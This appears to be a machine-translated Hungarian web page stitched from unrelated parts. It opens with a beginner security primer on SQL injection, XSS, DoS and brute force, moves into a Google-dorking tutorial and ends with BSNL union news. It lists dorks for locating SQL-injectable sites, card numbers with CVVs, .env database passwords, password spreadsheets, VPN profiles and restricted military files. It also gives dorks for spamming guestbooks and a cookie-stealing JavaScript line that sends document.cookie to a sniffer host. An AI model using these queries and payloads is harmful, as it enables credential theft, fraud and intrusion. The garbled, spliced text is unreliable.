Úgy döntöttem, beszélek egy kicsit információ biztonság. A cikk hasznos lesz kezdő programozóknak és azoknak, akik most kezdték el a Frontend fejlesztést. Mi a probléma?
Sok kezdő fejlesztő annyira rabja a kódírásnak, hogy teljesen megfeledkezik munkája biztonságáról. És ami a legfontosabb, megfeledkeznek az olyan sebezhetőségekről, mint az SQL lekérdezés, az XXS. Egyszerű jelszavakat is kitalálnak adminisztrációs paneljeikhez, és nyers erőszaknak vannak kitéve. Mik ezek a támadások, és hogyan lehet őket elkerülni?
SQL injekció
Az SQL-injektálás az adatbázis-támadások leggyakoribb típusa, amelyet egy adott DBMS-hez tartozó SQL-lekérdezéssel hajtanak végre. Sok ember, sőt nagyvállalat is szenved az ilyen támadásoktól. Az ok egy fejlesztői hiba az adatbázis írásakor, sőt, az SQL lekérdezések.
SQL-befecskendezési típusú támadás lehetséges az SQL-lekérdezésekben használt bemeneti adatok helytelen feldolgozása miatt. Egy hacker sikeres támadása esetén fennáll annak a veszélye, hogy nemcsak az adatbázisok tartalmát, hanem az adminisztrációs panel jelszavait és naplóit is elveszíti. És ez az adat elég lesz ahhoz, hogy teljesen átvegye a webhelyet, vagy visszafordíthatatlan módosításokat hajtson végre rajta.
A támadás sikeresen reprodukálható PHP, ASP, Perl és más nyelveken írt szkriptekben. Az ilyen támadások sikere inkább attól függ, hogy melyik DBMS-t használják, és hogyan valósítják meg magát a forgatókönyvet. A világon nagyon sok sebezhető oldal található az SQL-injekciókhoz. Ezt könnyű ellenőrizni. Elég beírni a "dorks"-t - ezek speciális kérések a sebezhető helyek megtalálásához. Íme néhány közülük:
- inurl:index.php?id=
- inurl:trainers.php?id=
- inurl:buy.php?category=
- inurl:cikk.php?ID=
- inurl:play_old.php?id=
- inurl:declaration_more.php?decl_id=
- inurl:pageid=
- inurl:games.php?id=
- inurl:page.php?file=
- inurl:newsDetail.php?id=
- inurl:galéria.php?id=
- inurl:cikk.php?id=
Hogyan kell használni őket? Elég beírni őket Google kereső vagy a Yandex. A keresőmotor nem csak egy sebezhető webhelyet, hanem egy oldalt is ad a sérülékenységhez. De nem állunk meg itt, és megbizonyosodunk arról, hogy az oldal valóban sebezhető. Ehhez elegendő egy „’” idézőjel az „id=1” érték után. Valami ilyesmi:
- inurl:games.php?id=1'
És a webhely hibát jelez az SQL-lekérdezéssel kapcsolatban. Mire van szüksége ezután a hackerünknek?
És akkor pont erre a linkre van szüksége a hibás oldalra. Ezután a sérülékenység kidolgozása a legtöbb esetben a "Kali linux" disztribúcióban zajlik, az ehhez a részhez tartozó segédprogramokkal: az injekciós kód bevezetésével és a szükséges műveletek végrehajtásával. Hogy ez hogyan fog történni, azt nem tudom megmondani. De az interneten találsz erről információt.
XSS támadás
Ez a fajta támadás a cookie-kon történik. Ők viszont nagyon szeretik megmenteni a felhasználókat. Miért ne? Hogyan nélkülük? Végtére is, a Cookie-nak köszönhetően nem vezetünk be százszor egy jelszót a Vk.com vagy a Mail.ru oldalról. És kevesen vannak, akik elutasítják őket. De az interneten gyakran megjelenik egy szabály a hackerek számára: a kényelmi együttható egyenesen arányos a bizonytalansági együtthatóval.
Az XSS-támadás végrehajtásához hackerünknek JavaScript-ismeretre van szüksége. A nyelv első pillantásra nagyon egyszerű és ártalmatlan, mert nem fér hozzá a számítógépes erőforrásokhoz. A hacker csak böngészőben tud JavaScripttel dolgozni, de ez is elég. Végül is a lényeg az, hogy beírjuk a kódot a weboldalra.
Nem részletezem a támadás folyamatát. Csak az alapokat és annak értelmét fogom elmondani, hogyan történik ez.
Egy hacker hozzáadhat JS-kódot néhány fórumhoz vagy vendégkönyvhöz:
A szkriptek átirányítanak minket egy fertőzött oldalra, ahol a kód lefut: legyen az sniffer, valamilyen tárhely vagy olyan exploit, amely valahogy ellopja a cookie-jainkat a gyorsítótárból.
Miért JavaScript? Mivel a JavaScript nagyszerűen használható a webes kérésekhez, és hozzáfér a cookie-khoz. De ha a szkriptünk átvisz minket valamelyik oldalra, akkor ezt a felhasználó könnyen észreveszi. Itt a hacker egy ravaszabb opciót használ - egyszerűen beírja a kódot a képbe.
Img=newImage();
Img.src=” http://192.168.1.7/sniff.php?”+document.cookie;
Egyszerűen létrehozunk egy képet, és hozzárendeljük a szkriptünket címként.
Hogyan védheti meg magát mindezektől? Nagyon egyszerű – ne kövessen gyanús linkeket.
DoS és DDos támadások
DoS (az angol szolgáltatásmegtagadásból - A szolgáltatásmegtagadás egy számítógépes rendszer elleni hackertámadás, amelynek célja, hogy meghiúsítsa azt. Ez olyan feltételek megteremtését jelenti, amelyek mellett a rendszer lelkiismeretes felhasználói nem férhetnek hozzá a biztosított rendszererőforrásokhoz (szerverekhez), vagy ez a hozzáférés nehézkes. Egy rendszerhiba is egy lépés lehet a rögzítés felé, ha vészhelyzetben a szoftver bármilyen kritikus információt közöl: például verzió, alkatrész programkód stb. De leggyakrabban ez a gazdasági nyomás mértéke: egy egyszerű szolgáltatás elvesztése, amely bevételt generál. A szolgáltatótól érkező számlák vagy a támadás elkerülésére tett intézkedések jelentősen eltalálják a zsebben lévő „célpontot”, jelenleg a DoS és a DDoS támadások a legnépszerűbbek, amelyek segítségével szinte minden rendszert meghibásodhatunk anélkül, hogy jogilag jelentős bizonyítékok maradnának.
Mi a különbség a DoS és a DDos támadások között?
A DoS egy intelligens módon felépített támadás. Például, ha a szerver nem ellenőrzi a bejövő csomagok helyességét, akkor egy hacker ilyen kérést tehet, amely örökké feldolgozásra kerül, és a processzornak nem lesz elegendő ideje más kapcsolatokkal dolgozni. Ennek megfelelően az ügyfelek a szolgáltatás megtagadását kapják. De a nagy, jól ismert webhelyek ilyen módon történő túlterhelése vagy letiltása nem fog működni. Meglehetősen széles csatornákkal és szupererős szerverekkel vannak felfegyverkezve, amelyek könnyen megbirkóznak egy ilyen túlterheléssel.
A DDoS valójában ugyanaz a támadás, mint a DoS. De ha a DoS-ben egy kéréscsomag van, akkor a DDoS-ben nagyon könnyen lehet, hogy több száz vagy több is lehet. Még a nagy teljesítményű szerverek sem képesek megbirkózni egy ilyen túlterheléssel. Mondok egy példát.
DoS támadásról akkor beszélünk, amikor valakivel beszélgetünk, de ekkor megjelenik egy rossz modorú személy, és hangosan sikoltozni kezd. Beszélni vagy lehetetlen, vagy nagyon nehéz. Megoldás: hívja a biztonságiakat, ami megnyugtat és kivezeti az illetőt a szobából. A DDoS támadások az, amikor több ezer ilyen rossz modorú ember fut be. Ebben az esetben az őrök nem fognak tudni csavarni és mindenkit elvinni.
A DoS-t és a DDoS-t számítógépekből, az úgynevezett zombikból állítják elő. Ezek a hackerek által feltört felhasználók számítógépei, akik nem is sejtik, hogy gépük részt vesz valamelyik szerver támadásában.
Hogyan védheti meg magát ettől? Általában semmiképpen. De megnehezítheti a hacker dolgát. Ehhez jó tárhelyet kell választania erős szerverekkel.
Brutális erő támadás
Egy fejlesztő rengeteg támadásvédelmi rendszert kitalálhat, teljes körűen átnézheti az általunk írt szkripteket, ellenőrizheti az oldalt a sebezhetőségekért stb. De amikor a webhely elrendezésének utolsó lépéséről van szó, nevezetesen amikor csak jelszót tesz az adminisztrációs panelre, egy dolgot elfelejthet. Jelszó!
Erősen nem ajánlott egyszerű jelszót beállítani. Ez lehet 12345, 1114457, vasya111 stb. Nem ajánlott 10-11 karakternél rövidebb jelszavakat beállítani. Ellenkező esetben előfordulhat, hogy a legáltalánosabb és nem összetett támadásnak – a Brute Force-nak – érik.
Brute force egy szótár alapú jelszó brute-force támadás speciális programok. A szótárak különbözőek lehetnek: latin, számok szerinti rendezés, mondjuk valamilyen tartományig, vegyes (latin + számok), sőt vannak szótárak egyedi szimbólumokkal @#4$%&*~~`'”\ ? stb.
Természetesen ez a fajta támadás könnyen elkerülhető, elég egy összetett jelszót kitalálni. Még a captcha is megmenthet. Továbbá, ha webhelye CMS-en készült, akkor sokan hasonló típusú támadást számítanak ki, és blokkolják az ip-t. Mindig emlékeznünk kell arra, hogy minél több különböző karakter van a jelszóban, annál nehezebb felvenni.
Hogyan működnek a hackerek? A legtöbb esetben vagy gyanítják, vagy már ismerik a jelszó egy részét. Teljesen logikus azt feltételezni, hogy a felhasználó jelszava biztosan nem 3 vagy 5 karakterből áll. Az ilyen jelszavak gyakori feltörésekhez vezetnek. Alapvetően a hackerek 5-10 karaktert vesznek fel, és hozzáadnak néhány olyan karaktert, amelyet valószínűleg előre tudnak. Ezután generáljon jelszavakat a kívánt tartományokkal. A Kali linux disztribúciónak még programjai is vannak ilyen esetekre. És íme, a támadás már nem tart sokáig, mivel a szótár kötete már nem olyan nagy. Ezenkívül a hacker használhatja a videokártya erejét. Némelyikük támogatja a CUDA rendszert, miközben a felsorolási sebesség akár 10-szeresére is nő. És most látjuk, hogy egy ilyen egyszerű támadás egészen valóságos. De nem csak a webhelyek vannak kitéve nyers erőszaknak.
Tisztelt fejlesztők, soha ne feledkezzünk meg az információbiztonsági rendszerről, mert manapság sokan, köztük államok is szenvednek ilyen típusú támadásoktól. Hiszen a legnagyobb kiszolgáltatottság az az ember, akit mindig valahol el lehet terelni, vagy valahol el lehet nézni. Programozók vagyunk, de nem programozott gépek. Legyen mindig résen, mert az információvesztés súlyos következményekkel fenyeget!
A személyes adatok fogadása nem mindig jelent feltörést – néha nyilvánosan közzéteszik. A Google beállításainak ismerete és egy kis találékonyság lehetővé teszi, hogy sok érdekes dolgot találjon – a hitelkártyaszámoktól az FBI-dokumentumokig.
FIGYELEM
Minden információ csak tájékoztató jellegű. Sem a szerkesztők, sem a szerző nem vállal felelősséget a cikk anyagai által okozott esetleges károkért.Ma már minden kapcsolódik az internethez, nem törődve a hozzáférés korlátozásával. Ezért sok személyes adat a keresőmotorok martalékává válik. A pókrobotok már nem korlátozódnak a weboldalakra, hanem indexelik a weben elérhető összes tartalmat, és folyamatosan bizalmas információkat adnak hozzá adatbázisaikhoz. Ezeket a titkokat könnyű megtanulni – csak tudnod kell, hogyan kérdezz rájuk.
Fájlokat keres
Képes kezekben a Google gyorsan megtalál mindent, ami rossz a weben, például személyes adatokat és hivatalos használatra szánt fájlokat. Gyakran kulcsként vannak elrejtve a szőnyeg alá: nincsenek valódi hozzáférési korlátozások, az adatok csak az oldal hátulján hevernek, ahová a linkek nem vezetnek. A Google szabványos webes felülete csak alapvető speciális keresési beállításokat biztosít, de ezek is elegendőek lesznek.
Két operátor használható a Google-keresések bizonyos típusú fájlokra való korlátozására: filetype és ext . Az első azt a formátumot állítja be, amelyet a keresőmotor a fájl fejléce alapján határoz meg, a második a fájl kiterjesztését, függetlenül annak belső tartalmától. Mindkét esetben keresésekor csak a kiterjesztést kell megadni. Kezdetben az ext operátort olyan esetekben lehetett kényelmesen használni, amikor nem voltak meghatározott formátumú jellemzők a fájlhoz (például ini és cfg konfigurációs fájlok keresésére, amelyek bármit tartalmazhatnak). Mostanra megváltoztak a Google algoritmusai, és nincs látható különbség az operátorok között – az eredmények a legtöbb esetben ugyanazok.
A kimenet szűrése
Alapértelmezés szerint a Google az indexelt oldalak összes fájljába beírt szavakat és általában minden karaktert keres. A keresési hatókört korlátozhatja a legfelső szintű tartomány, egy adott webhely vagy a kívánt sorozat helye szerint magukban a fájlokban. Az első két lehetőségnél a site utasítást használják, majd a tartomány vagy a kiválasztott webhely nevét. A harmadik esetben az operátorok egész halmaza lehetővé teszi az információk keresését a szolgáltatási mezőkben és a metaadatokban. Például az allinurl megtalálja a megadottat magukban a linkek törzsében, allinachor - a címkével ellátott szövegben , allintitle - az oldalfejlécekben, allintext - az oldalak törzsében.
Minden operátorhoz létezik egy könnyebb változat, rövidebb névvel (az összes előtag nélkül). A különbség az, hogy az allinurl az összes szót megtalálja, míg az inurl csak az elsőhöz. A lekérdezés második és azt követő szavai bárhol megjelenhetnek a weboldalakon. Az inurl operátor jelentésében is különbözik egy másik hasonlótól. Az első azt is lehetővé teszi, hogy a kívánt dokumentumra mutató hivatkozásban tetszőleges karaktersorozatot találjon (például /cgi-bin/), amelyet széles körben használnak az ismert sebezhetőségű összetevők megtalálására.
Próbáljuk ki a gyakorlatban. Vegyük az allintext szűrőt, és a lekérdezésben a hitelkártyaszámok és ellenőrző kódok listáját adjuk vissza, amelyek csak két év múlva járnak le (vagy amikor a tulajdonosok megunják, hogy mindenkit sorban etessenek).
Allintext: kártyaszám lejárati dátuma /2017 cvv 
Ha azt olvassuk a hírekben, hogy egy fiatal hacker "feltörte" a Pentagon vagy a NASA szervereit, titkos információkat lopva, akkor a legtöbb esetben pontosan ez az elemi technikája a Google használatának. Tegyük fel, hogy érdekel minket a NASA alkalmazottainak listája és elérhetőségeik. Egy ilyen lista bizonyára elektronikus formában van. Kényelmi okokból vagy figyelmen kívül hagyás miatt magán a szervezet honlapján is elhelyezhető. Logikus, hogy ebben az esetben nem lesz rá hivatkozás, mivel belső használatra készült. Milyen szavak lehetnek egy ilyen fájlban? Legalább - a "cím" mező. Mindezeket a feltételezéseket könnyű tesztelni.
inurl:nasa.gov fájltípus:xlsx "cím"
Használjuk a bürokráciát
Az ilyen leletek kellemes apróság. Az igazán komoly fogás a Google Webmaster Operatorok, magának a webnek és a keresett dolgok szerkezetének részletesebb ismeretében rejlik. A részletek ismeretében könnyedén szűrheti a kimenetet és finomíthatja a szükséges fájlok tulajdonságait, hogy a többiben valóban értékes adatokhoz jusson. Vicces, hogy itt a bürokrácia segít. Tipikus megfogalmazásokat állít elő, amelyek kényelmessé teszik a véletlenül az internetre kiszivárgott titkos információk keresését.
Például a terjesztési nyilatkozat bélyegzője, amely kötelező az Egyesült Államok Védelmi Minisztériumának irodájában, szabványos korlátozásokat jelent egy dokumentum terjesztésére vonatkozóan. Az A betű nyilvános kiadásokat jelöl, amelyekben nincs semmi titok; B - kizárólag belső használatra, C - szigorúan bizalmas, és így tovább F-ig. Külön van az X betű, amely különösen értékes információkat jelöl, amelyek a legmagasabb szintű államtitkot képviselik. Azok keressenek ilyen dokumentumokat, akiknek ügyeletesek, mi pedig a C betűvel ellátott fájlokra szorítkozunk. A DoDI 5230.24 szerint ilyen jelölést az exportellenőrzés alá tartozó kritikus technológiák leírását tartalmazó dokumentumokhoz rendelnek. Ilyen gondosan őrzött információkat találhat az amerikai hadsereg számára kijelölt .mil legfelső szintű domain webhelyein.
"FORGALÁSI NYILATKOZAT C" inurl:navy.mil 
Nagyon kényelmes, hogy csak az Egyesült Államok Védelmi Minisztériumának és szerződéses szervezeteinek webhelyeit gyűjtik össze a .mil tartományban. A domain-korlátozott keresési eredmények kivételesen tisztaak, és a címek magukért beszélnek. Gyakorlatilag felesleges így kutatni orosz titkok után: a .ru és .rf tartományban káosz uralkodik, és számos fegyverrendszer neve botanikai (PP "Kiparis", önjáró fegyverek "Acacia") vagy akár. mesés (TOS "Pinocchio").
A .mil domainben található webhely bármely dokumentumának gondos megvizsgálásával további jelölőket láthat a keresés finomításához. Például egy hivatkozás a "Sec 2751" exportkorlátozásra, amely érdekes műszaki információk kereséséhez is kényelmes. Időnként eltávolítják a hivatalos oldalakról, ahol egykor megjelent, ezért ha nem tud egy érdekes linket követni a keresési eredmények között, használja a Google gyorsítótárat (gyorsítótár operátor) vagy az Internet Archívum webhelyét.
Felmászunk a felhők közé
A kormányhivataloktól véletlenül feloldott dokumentumokon túlmenően a Google gyorsítótárában időnként felbukkannak a Dropboxból és más adattárolási szolgáltatásokból származó személyes fájlokra mutató hivatkozások, amelyek "privát" linkeket hoznak létre a nyilvánosan közzétett adatokhoz. Még rosszabb az alternatív és saját készítésű szolgáltatásokkal. A következő lekérdezés például megkeresi az összes olyan Verizon-ügyfél adatait, amelyek FTP-kiszolgálóval rendelkeznek, és aktívan használnak útválasztót.
Allinurl:ftp://verizon.net
Ma már több mint negyvenezer ilyen okos ember van, 2015 tavaszán pedig egy nagyságrenddel többen. A Verizon.net helyett bármely ismert szolgáltató nevét helyettesítheti, és minél híresebb, annál nagyobb lehet a fogás. A beépített FTP-kiszolgálón keresztül megtekintheti az útválasztóhoz csatlakoztatott külső meghajtón lévő fájlokat. Általában ez egy NAS távoli munkához, egy személyes felhő vagy valamilyen peer-to-peer fájlletöltés. Az ilyen médiák minden tartalmát a Google és más keresőmotorok indexeli, így közvetlen hivatkozáson keresztül érheti el a külső meghajtókon tárolt fájlokat.
Bekukucskáló konfigurációk
A felhőkbe való nagykereskedelmi migráció előtt az egyszerű FTP-szerverek, amelyeken szintén hiányoztak a sebezhetőségek, távoli tárolóként uralkodtak. Sok közülük ma is aktuális. Például a népszerű WS_FTP Professional program konfigurációs adatokat, felhasználói fiókokat és jelszavakat tárol a ws_ftp.ini fájlban. Könnyű megtalálni és elolvasni, mert minden bejegyzést egyszerű szövegben tárolnak, a jelszavakat pedig a Triple DES algoritmussal titkosítják, minimális homályosítás után. A legtöbb verzióban elegendő az első bájt eldobása.
Az ilyen jelszavak visszafejtése egyszerű a WS_FTP Password Decryptor segédprogram vagy egy ingyenes webszolgáltatás segítségével.
Amikor egy tetszőleges webhely feltöréséről beszélünk, ez általában a CMS vagy az e-kereskedelmi alkalmazások konfigurációs fájljainak naplóiból és biztonsági másolatából származó jelszó megszerzését jelenti. Ha ismeri jellemző szerkezetüket, könnyen jelezheti kulcsszavakat. A ws_ftp.ini fájlban található sorok rendkívül gyakoriak. Például a Drupal és a PrestaShop mindig rendelkezik felhasználói azonosítóval (UID) és hozzá tartozó jelszóval (pwd), és minden információ .inc kiterjesztésű fájlokban tárolódik. Így kereshetsz rájuk:
"pwd=" "UID=" ext:inc
Felfedjük a jelszavakat a DBMS-ből
Az SQL szerverek konfigurációs fájljaiban a felhasználónevek és az e-mail címek szöveges formában tárolódnak, jelszavak helyett pedig ezek MD5-kivonatait rögzítik. Ezek visszafejtése szigorúan véve lehetetlen, de az ismert hash-jelszó párok között találhatunk egyezést.
Eddig vannak olyan DBMS-ek, amelyek nem is használnak jelszókivonatolást. Bármelyik konfigurációs fájlja egyszerűen megtekinthető a böngészőben.
Intext:DB_PASSWORD fájltípus:env
A szervereken való megjelenéssel ablakok helye konfigurációs fájlok részben elfoglalták a rendszerleíró adatbázist. Ugyanúgy kereshet az ágai között, a reg fájltípust használva. Például így:
Fájltípus:reg HKEY_CURRENT_USER "Password"=
Ne felejtsd el a nyilvánvalót
Néha a Google által véletlenül megnyitott és elkapott adatok segítségével is el lehet jutni minősített információkhoz. Az ideális megoldás az, ha megtalálja a jelszavak listáját valamilyen általános formátumban. Tárolja a fiókadatokat szöveges fájl, egy Word dokumentum vagy egy Excel táblázat csak kétségbeesett ember lehet, de belőlük mindig van elég.
Fájltípus:xls inurl:jelszó
Egyrészt számos eszköz létezik az ilyen események megelőzésére. Megfelelő hozzáférési jogosultságokat kell megadni a htaccess-ben, javítani kell a CMS-t, nem szabad bal oldali szkripteket használni és más lyukakat bezárni. Létezik egy robots.txt kizárási listát tartalmazó fájl is, amely megtiltja, hogy a keresőmotorok indexeljék az abban megadott fájlokat és könyvtárakat. Viszont ha valamelyik szerveren eltér a robots.txt felépítése a szabványostól, akkor rögtön kiderül, hogy mit akarnak elrejteni rajta.
A könyvtárak és fájlok listáját bármely webhelyen a szabványos feliratozási index előzi meg. Mivel szolgáltatási célból a címben kell szerepelnie, célszerű a keresést az intitle operátorra korlátozni. Érdekes dolgok találhatók az /admin/, /personal/, /etc/ és még a /secret/ könyvtárban is.
Kövesse a frissítéseket
A relevancia itt rendkívül fontos: a régi sebezhetőségek nagyon lassan záródnak be, de a Google és annak Keresési eredmények folyamatosan változnak. Még az "utolsó másodperc" szűrő (&tbs=qdr:s a kérés URL-címének végén) és a "valós idejű" szűrő (&tbs=qdr:1) között is van különbség.
A Google-tól származó utolsó fájlfrissítési dátum időintervalluma is implicit módon megjelenik. A grafikus webes felületen keresztül kiválaszthatunk egyet a tipikus időszakok közül (óra, nap, hét stb.), vagy beállíthatunk dátumtartományt, de ez a módszer nem alkalmas automatizálásra.
Típus szerint címsor csak találgatni lehet, hogyan lehet korlátozni az eredmények kimenetét a &tbs=qdr: konstrukcióval. Az utána lévő y betű egy éves korlátot ad meg (&tbs=qdr:y), m az utolsó hónap eredményeit, w a hét, d az elmúlt nap, h az utolsó óra, n a perc eredményeit, és adj egy percet. A Google számára ismert legutóbbi eredmények a &tbs=qdr:1 szűrő használatával érhetők el.
Ha trükkös szkriptet kell írnia, hasznos lehet tudni, hogy a dátumtartomány a Google Julian formátumban van beállítva a daterange operátoron keresztül. Például így találhatja meg a listát PDF dokumentumok 2015. január 1. és július 1. között feltöltött bizalmas szóval.
Bizalmas fájltípus: pdf dátumtartomány: 2457024-2457205
A tartomány Julian dátumformátumban van megadva tizedesjegyek nélkül. Kényelmetlen manuálisan lefordítani őket a Gergely-naptárból. Egyszerűbb a dátum konvertáló használata.
Ismét célzás és szűrés
Amellett, hogy további operátorokat ad meg a keresési lekérdezésben, közvetlenül a hivatkozás törzsében is elküldhetők. Például a filetype:pdf tulajdonság az as_filetype=pdf konstrukciónak felel meg. Így célszerű bármilyen pontosítást beállítani. Tegyük fel, hogy a csak a Hondurasi Köztársaságból származó eredményeket úgy állítjuk be, hogy hozzáadjuk a cr=countryHN szerkezetet a keresési URL-hez, de csak Bobruisk városából - gcs=Bobruisk . Tekintse meg a fejlesztői részt a teljes listáért.
A Google automatizálási eszközeit úgy tervezték, hogy megkönnyítsék az életet, de gyakran növelik a gondokat. Például egy felhasználó városát a felhasználó IP-címe határozza meg a WHOIS-on keresztül. Ezen információk alapján a Google nem csak a szerverek közötti terhelést egyensúlyozza ki, hanem a keresési eredményeket is megváltoztatja. Régiótól függően ugyanarra a lekérdezésre különböző eredmények kerülnek az első oldalra, és előfordulhat, hogy ezek egy része teljesen rejtett. Érezze magát kozmopolitának, és bármely ország információinak keresése segít a gl=country direktíva utáni kétbetűs kódjában. Például Hollandia kódja NL, míg a Vatikánnak és Észak-Koreának nincs saját kódja a Google-ban.
A keresési eredmények gyakran még néhány speciális szűrő használata után is tele vannak. Ebben az esetben könnyen finomítható a lekérdezés néhány kivételszó hozzáadásával (mindegyik mínuszjel előzi meg). Például a banki , a nevek és az oktatóanyagok gyakran használatosak a Személyes szóval. Ezért a tisztább keresési eredmények nem egy lekérdezés tankönyvi példáját jelenítik meg, hanem egy finomított lekérdezést:
Cím: "A /Személyes/" -nevek indexe -oktatóanyag -banki
Utolsó példa
Egy kifinomult hackert az különböztet meg, hogy egyedül gondoskodik mindenről, amire szüksége van. Például a VPN kényelmes dolog, de vagy drága, vagy ideiglenes és korlátozásokkal. Egyedül a regisztráció túl drága. Még jó, hogy vannak csoportos előfizetések, és a Google segítségével könnyen bekerülhet egy csoportba. Ehhez csak keresse meg a Cisco VPN konfigurációs fájlt, amelynek meglehetősen nem szabványos PCF kiterjesztése és felismerhető elérési útja van: Program Files\Cisco Systems\VPN Client\Profiles . Egy kérés, és csatlakozhatsz például a Bonni Egyetem barátságos személyzetéhez.
Fájltípus: pcf vpn VAGY csoport
INFO
A Google megtalálja a jelszavakat tartalmazó konfigurációs fájlokat, de sok közülük titkosított vagy kivonatokkal van helyettesítve. Ha rögzített hosszúságú karakterláncokat lát, azonnal keressen egy visszafejtő szolgáltatást.A jelszavakat titkosított formában tárolják, de Maurice Massard már írt egy programot a visszafejtésre, és ingyenesen biztosítja a thecampusgeeks.com oldalon.
Nál nél Google segítség több száz különböző típusú támadást és penetrációs tesztet végeznek. Számos lehetőség létezik, amelyek hatással vannak a népszerű programokra, a főbb adatbázis-formátumokra, számos PHP sebezhetőségre, felhőkre stb. Ha pontosan tudja, hogy mit keres, sokkal könnyebben hozzájuthat a szükséges információkhoz (különösen azokhoz, amelyeket nem állt szándékában nyilvánosságra hozni). Nem csak a Shodan ad érdekes ötleteket, hanem az indexelt hálózati erőforrások bármely adatbázisa!
Hogyan kereshet a google.com használatával
Valószínűleg mindenki tudja, hogyan kell ezt használni keresőmotor mint a Google =) De nem mindenki tudja, hogy ha helyesen állít össze egy keresési lekérdezést speciális struktúrák segítségével, sokkal hatékonyabban és gyorsabban érheti el a keresett találatokat =) Ebben a cikkben megpróbálom bemutatni, hogy mit és hogyan meg kell tennie a helyes kereséshez
A Google számos speciális keresési operátort támogat, amelyek különleges jelentéssel bírnak a google.com webhelyen történő keresés során. Jellemzően ezek az operátorok módosítják a keresést, vagy akár teljesen más típusú keresések elvégzésére is felszólítják a Google-t. Például a design link: egy speciális operátor, és a lekérdezés link: www.google.com nem ad normál keresést, hanem megtalálja az összes olyan weboldalt, amely a google.com-ra mutató hivatkozást tartalmaz.
alternatív kéréstípusok
gyorsítótár: Ha más szavakat is tartalmaz a lekérdezésben, a Google kiemeli ezeket a szavakat a gyorsítótárazott dokumentumban.
Például, gyorsítótár: www.webhely gyorsítótárban tárolt tartalmat jelenít meg a „web” szó kiemelésével.
link: a fenti keresési lekérdezés a megadott lekérdezésre mutató hivatkozásokat tartalmazó weboldalakat jeleníti meg.
Például: link: www.weboldal megjeleníti az összes olyan oldalt, amely a http://www.site-ra hivatkozik
összefüggő: Megjeleníti azokat a weboldalakat, amelyek "kapcsolódnak" a megadott weboldalhoz.
Például, kapcsolódó: www.google.com listázza a Google kezdőlapjához hasonló weboldalakat.
info: Információkérés: a Google által a kért weboldallal kapcsolatos információkat biztosít.
Például, info:honlap információkat fog mutatni a fórumunkról =) (Armada - Felnőtt webmesterek fóruma).
Egyéb információigénylés
határozza meg: A define: lekérdezés az ezután beírt szavak definícióját adja meg, különféle online forrásokból összeállítva. A definíció a teljes beírt kifejezésre vonatkozik (vagyis a pontos lekérdezésben szereplő összes szót tartalmazza).
készletek: Ha részvényekkel indít lekérdezést: a Google a többi lekérdezési kifejezést tőzsdei jegyként kezeli, és egy oldalra hivatkozik, amely az adott karakterekre előkészített információkat mutatja.
Például, részvények: intel yahoo információkat jelenít meg az Intelről és a Yahoo-ról. (Ne feledje, hogy be kell írnia a karaktereket legfrissebb hírek, nem a cég neve)
Módosítók kérése
webhely: Ha megadja a site: kifejezést a lekérdezésében, a Google az adott domainben talált webhelyekre korlátozza az eredményeket.
Egyedi zónákra is kereshet, például ru, org, com stb. site:com site:ru)
allintitle: Ha az allintitle: lekérdezést futtatja, a Google korlátozza az eredményeket a címben szereplő összes lekérdezési szóra.
Például, allintitle: google kereső visszaadja az összes Google keresési oldalt, például képeket, blogot stb
cím: Ha megadja az intitle: kifejezést a lekérdezésében, a Google azokra a dokumentumokra korlátozza a találatokat, amelyek címében ezt a szót tartalmazzák.
Például, cím: Vállalkozás
allinurl: Ha lekérdezést futtat az allinurl-lel: a Google az URL-ben szereplő összes lekérdezési szóra korlátozza az eredményeket.
Például, allinurl: google kereső visszaadja a dokumentumokat a google segítségével, és a címben keres. Opcionálisan perjellel (/) is elválaszthatja a szavakat, ekkor a program a perjel mindkét oldalán lévő szavakat keresi ugyanazon az oldalon: Példa allinurl: foo/bar
inurl: Ha megadja az inurl: kifejezést a lekérdezésében, a Google az eredményeket azokra a dokumentumokra korlátozza, amelyek az URL-ben ezt a szót tartalmazzák.
Például, Animáció inurl:webhely
szöveg: csak az oldal szövegében keres a megadott szóra, figyelmen kívül hagyva a linkek címét, szövegét, és egyéb nem kapcsolódó dolgokat. Ennek a módosítónak van egy származéka is - allintext: azok. továbbá a lekérdezésben szereplő összes szó csak a szövegben lesz keresve, ami szintén fontos, figyelmen kívül hagyva a linkekben gyakran használt szavakat
Például, szöveg: fórum
időintervallum: időkeretekben keres (dátumtartomány:2452389-2452389), a dátumok Julian-formátumban vannak megadva.
Nos, és mindenféle érdekes példák a kérésekre
Példák lekérdezések összeállítására a Google számára. Spammerek számára
inurl:control.guest?a=sign
Site:books.dreambook.com „Homepage URL” „Sign my” inurl:sign
Webhely: www.freegb.net honlap
Inurl:sign.asp "Karakterszám"
"Üzenet:" inurl:sign.cfm "Feladó:"
inurl:register.php „Felhasználói regisztráció” „Webhely”
Inurl:edu/vendégkönyv „Aláírja a vendégkönyvet”
Inurl:post "Hozzászólás" "URL"
Inurl:/archives/ "Megjegyzések:" "Emlékszel az adatokra?"
„Szkript és vendégkönyv Készítette:” „URL:” „Megjegyzések:”
inurl:?action=add "phpBook" "URL"
Cím: "Új történet beküldése"
Magazinok
inurl:www.livejournal.com/users/mode=reply
inurl greatestjournal.com/mode=reply
Inurl:fastbb.ru/re.pl?
inurl:fastbb.ru /re.pl? "Vendégkönyv"
Blogok
Inurl:blogger.com/comment.g?”postID”"névtelen"
Inurl:typepad.com/ „Hozzászólás” „Emlékszel személyes adatokra?”
Inurl:greatestjournal.com/community/ „Hozzászólás” „névtelen poszterek címei”
„Hozzászólás” „névtelen plakátok címei” -
Cím: "Hozzászólás"
Inurl:pirillo.com „Hozzászólás”
Fórumok
Inurl:gate.html?”name=Fórumok” „mode=reply”
inurl:”forum/posting.php?mode=reply”
inurl: "mes.php?"
inurl: "tagok.html"
inurl:fórum/taglista.php?”
Az üzenetek 2020. január hónapban frissültek
16-01-2020
Részvét üzenet
A SNEA mély szomorúságot fejez ki a halála miatt
Veterán vezető
Com K. Viswanathan
A JETA/JTOA CHQ pénztárosa (3 alkalommal)
19/11, D blokk Nandhini lakások templomút, Chrompet Chennai 44,
15-01-2020
15-01-2020
15-01-2020
Létfontosságú áttörés a Triple Play FTTH szolgáltatásban a BSNL-n keresztül:
Nyílt szabályzat az IPTV biztosítására: A BSNL FTTH-n keresztül a tartalomszolgáltatók/partnerek által IPTV szolgáltatások biztosítására vonatkozó, régóta várt szabályzatot a BSNL CO.
Ezt a vállalkozást úgy hirdetik, mint a BSNL-ek válaszát a Triple Play szolgáltatásokat nyújtó nagy privát játékosoknak –
Ezzel a projekttel a BSNL biztosítja Valódi Triple Play szolgáltatás az ügyfeleknek, mert itt a TV-nézés nem fog internetadatokat fogyasztani.
Ez lesz a BSNL újjáélesztésének egyik fő életvonala.
